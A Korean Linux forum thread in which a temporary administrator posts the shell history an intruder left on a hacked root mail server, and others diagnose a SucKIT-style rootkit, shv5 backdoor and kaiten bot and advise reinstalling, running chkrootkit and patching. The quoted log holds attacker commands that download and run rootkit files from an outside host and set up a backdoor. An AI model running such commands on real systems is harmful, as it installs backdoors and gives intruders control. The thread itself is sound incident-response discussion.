해킹된 것 같습니다...무슨 짖을 한 것인지 알고 싶습니다.

since90의 이미지

어떻게 들어 왔는지도 모르겠고 아래와 같은 명령어들을 사용했습니다. 제가 임시로 시스템을 관리하고 있는데 걱정이 많습니다.

2004년 12월 31일 10시 40분경 전후

[root@mail1 root]# sh inst

[root@mail1 root]# rm -rf inst

[root@mail1 root]# tar -zxvf shv5.tar.gz

[root@mail1 root]# cd /lib/security/.sk12

[root@mail1 root]# ./sk

[root@mail1 root]# cd /tmp/shv5

[root@mail1 root]# ./setup lowkeyzorz 37998

[root@mail1 root]# cd /tmp

[root@mail1 root]# ls

[root@mail1 root]# locate /

[root@mail1 root]# ls

[root@mail1 root]# ls

[root@mail1 root]# rm -rf /lib/security/.sk12

[root@mail1 root]# wget hbc.z

[root@mail1 root]# cd /dev

[root@mail1 root]# ftp

[root@mail1 root]# chmod +x kaiten

[root@mail1 root]# ./kaiten

[root@mail1 root]# cat /proc/meminfo

[root@mail1 root]# cat /proc/cpuinfo

[root@mail1 root]# cd /root

[root@mail1 root]# cat .bash_history

[root@mail1 root]# exit

[root@mail1 root]# rm -rf brk

[root@mail1 root]# wget hbc.zuka.net/shv5.tar.gz

[root@mail1 root]# wget hbc.zuka.net/inst

[root@mail1 root]# sh

[root@mail1 root]# exit

보완 및 후속 조치에 대한 조언 부탁드립니다.

neogeo의 이미지

since90 wrote:
어떻게 들어 왔는지도 모르겠고 아래와 같은 명령어들을 사용했습니다. 제가 임시로 시스템을 관리하고 있는데 걱정이 많습니다.

2004년 12월 31일 10시 40분경 전후

[root@mail1 root]# sh inst

[root@mail1 root]# rm -rf inst

[root@mail1 root]# tar -zxvf shv5.tar.gz

[root@mail1 root]# cd /lib/security/.sk12

[root@mail1 root]# ./sk

[root@mail1 root]# cd /tmp/shv5

[root@mail1 root]# ./setup lowkeyzorz 37998

[root@mail1 root]# cd /tmp

[root@mail1 root]# ls

[root@mail1 root]# locate /

[root@mail1 root]# ls

[root@mail1 root]# ls

[root@mail1 root]# rm -rf /lib/security/.sk12

[root@mail1 root]# wget hbc.z

[root@mail1 root]# cd /dev

[root@mail1 root]# ftp

[root@mail1 root]# chmod +x kaiten

[root@mail1 root]# ./kaiten

[root@mail1 root]# cat /proc/meminfo

[root@mail1 root]# cat /proc/cpuinfo

[root@mail1 root]# cd /root

[root@mail1 root]# cat .bash_history

[root@mail1 root]# exit

[root@mail1 root]# rm -rf brk

[root@mail1 root]# wget hbc.zuka.net/shv5.tar.gz

[root@mail1 root]# wget hbc.zuka.net/inst

[root@mail1 root]# sh

[root@mail1 root]# exit

보완 및 후속 조치에 대한 조언 부탁드립니다.

살펴보니 어여 갈아 엎으시는게 상책입니다.

backdoor 를 잔뜩 심어놓고 갔군요.

일단 root 로 잠입한 경로는 저것만으로는 알수 없겠습니다.

다시 까시는게 상책이라고 말씀드리고 싶군요.

Neogeo - Future is Now.

endt0and의 이미지

흠...해킹 조심해야겠군요...이거보니까 제 컴퓨터도 한번확인하고싶은데
뭐를 확인하면 해킹당행는지 안당했는지 알수있는지요??(초보라..)

익명 사용자의 이미지

file 이름에서 볼때 SuckIt 이라는 exploit 에 당한듯 싶습니다.

chkrootkit 으로 검사해 보시면, 아마도 다른 툴도 많이 깔려있을듯.

아마 ps, ls 도 이미 변조되었을겁니다.

warpdory의 이미지

해 놓은 걸 보니 요새 유행하는 ssh 무작위 공격에 당한 걸로 보이네요.

요새 ssh 보안 패치 안한 서버들을 저렇게 뚫고 들어와서 SuckIt 등의 exploit 로 root 따서 놀고 가는 걸 많이 봤거든요.

일단 필요한 데이터는 백업받고 최신 배포판으로 깔고 항상 보안 패치에 신경 쓰시고, ssh 등은 필요한 계정만 열어두시고, 접속할 수 있는 ip 를 제한하는 것(iptables 나 pam 등으로...)을 권합니다.


---------
귓가에 햇살을 받으며 석양까지 행복한 여행을...
웃으며 떠나갔던 것처럼 미소를 띠고 돌아와 마침내 평안하기를...
- 엘프의 인사, 드래곤 라자, 이영도

즐겁게 놀아보자.

atie의 이미지

endt0and wrote:
흠...해킹 조심해야겠군요...이거보니까 제 컴퓨터도 한번확인하고싶은데
뭐를 확인하면 해킹당행는지 안당했는지 알수있는지요??(초보라..)

chkrootkit 설치해서 실행시켜 보세요. 그리고, 다음의 코드를 daily cron으로 만들어 놓으면 매일 메일로 검사 결과를 받아 볼 수 있죠.

Quote:
chkrootkit | mail -s "Daily chkrootkit from servername" admin@youremail.com
(servername과 admin@youremail.com은 각자에 맞게 변경)

----
I paint objects as I think them, not as I see them.
atie's minipage

mudori의 이미지

그쪽에 nobody 소유로된 야리꾸리 파일들 있으면 web쪽 관련으로 침투했을 가능성이 있구요. 요즘 php 버그로 들어오는게 대세로 보이네요.

그렇지 않다면 다방면으로 알아봐야겠네요.

mudori의 이미지

패키지 업데이트도 해주고 백도어 삭제해주는등 기본 조치만 해주면 됩니다.

since90의 이미지

나름데로 공부해서 조치하도록 하겠습니다.

거듭 고맙습니다.

nthroot의 이미지

brk 를 보니 do_brk 로 루트를 획득했을것 같네요.
중간에 이것저것 생략된것 같아서 정확히는 모르겠지만
흠 무조건 갈아엎는것보다 원인을 확실히 찾는게 순서일것 같네요.
최근에 저도 아파치 1.3.37 버전을 사용하다가 당했었는데
다행이도 내부에서 루트 획득할만한건 패치를 모두 한 상태라서
nobody 권한으로 어슬렁거리던 크래커랑 마주쳤던적이 있네요.
덕분에 밤늦게까지 서버 점검하고 apache 1.3.39 로 엎는 수고를 했죠.

패치가능한건 다 하시고 포트 점검하시고 내부에 setuid 걸린건 모두 제거하세요.
그리고 서비스와 관련된 계정들 nobody, ftp, smmsp 와 같은 계정들은 하나의 그룹으로 묶어서 별도로 관리하는게 좋습니다.

예를 들면 nonsh 라는 그룹으로 묶어서 내부 사용자들만 사용할 필요가 있는 모든 파일/디렉토리에 대해서 nonsh 그룹으로 해놓고 퍼미션을 모두 막으시면 외부에서 뚫어서 서비스 권한을 획득해도 더이상 루트로 가는 방법이 차단됩니다. 커널버그만 남게되는데 커널만 주기적으로 업그레이드 해주면 완벽하다고 할 수 있죠.

------식은이 처------
길이 끝나는 저기엔 아무 것도 없어요. 희망이고 나발이고 아무 것도 없어.

익명 사용자의 이미지

nthroot wrote:

최근에 저도 아파치 1.3.37 버전을 사용하다가 당했었는데
다행이도 내부에서 루트 획득할만한건 패치를 모두 한 상태라서
nobody 권한으로 어슬렁거리던 크래커랑 마주쳤던적이 있네요.
덕분에 밤늦게까지 서버 점검하고 apache 1.3.39 로 엎는 수고를 했죠.

apache 1.3.33 버전이 최신 버전이 아닌가요?(오타?)

얼마전에 33 으로 업그레이드 했는데, 그 사이에 릴리즈 되었나 했습니다.

divetou의 이미지

Apache 2.0.52 가 최신이 아니던가요?

1점대 버전은 1.3.33이 최신 Release지만, 2점대 버전을 최신으로 보는 것 아닌가요? ^^;

커널도 2.4 대 버전이 계속 Release되고 있기는 하지만 최신커널이라고 하지는 않는 것 처럼요.
(별로 맞지 않는 비유가 될지도 모르겠습니다만 ^^; )

ps. 스레드를 여신 분께
(딴지는 절대 아닙니다.)
'짖'이 아니라, '짓'입니다.
http://kr.kordic.yahoo.com/kor/search.html?p=%C2%A2

==============================
꿈꾸는소년

댓글 달기

Filtered HTML

  • 텍스트에 BBCode 태그를 사용할 수 있습니다. URL은 자동으로 링크 됩니다.
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>
  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.

BBCode

  • 텍스트에 BBCode 태그를 사용할 수 있습니다. URL은 자동으로 링크 됩니다.
  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param>
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.

Textile

  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • You can use Textile markup to format text.
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>

Markdown

  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • Quick Tips:
    • Two or more spaces at a line's end = Line break
    • Double returns = Paragraph
    • *Single asterisks* or _single underscores_ = Emphasis
    • **Double** or __double__ = Strong
    • This is [a link](http://the.link.example.com "The optional title text")
    For complete details on the Markdown syntax, see the Markdown documentation and Markdown Extra documentation for tables, footnotes, and more.
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>

Plain text

  • HTML 태그를 사용할 수 없습니다.
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.
  • 줄과 단락은 자동으로 분리됩니다.
댓글 첨부 파일
이 댓글에 이미지나 파일을 업로드 합니다.
파일 크기는 8 MB보다 작아야 합니다.
허용할 파일 형식: txt pdf doc xls gif jpg jpeg mp3 png rar zip.
CAPTCHA
이것은 자동으로 스팸을 올리는 것을 막기 위해서 제공됩니다.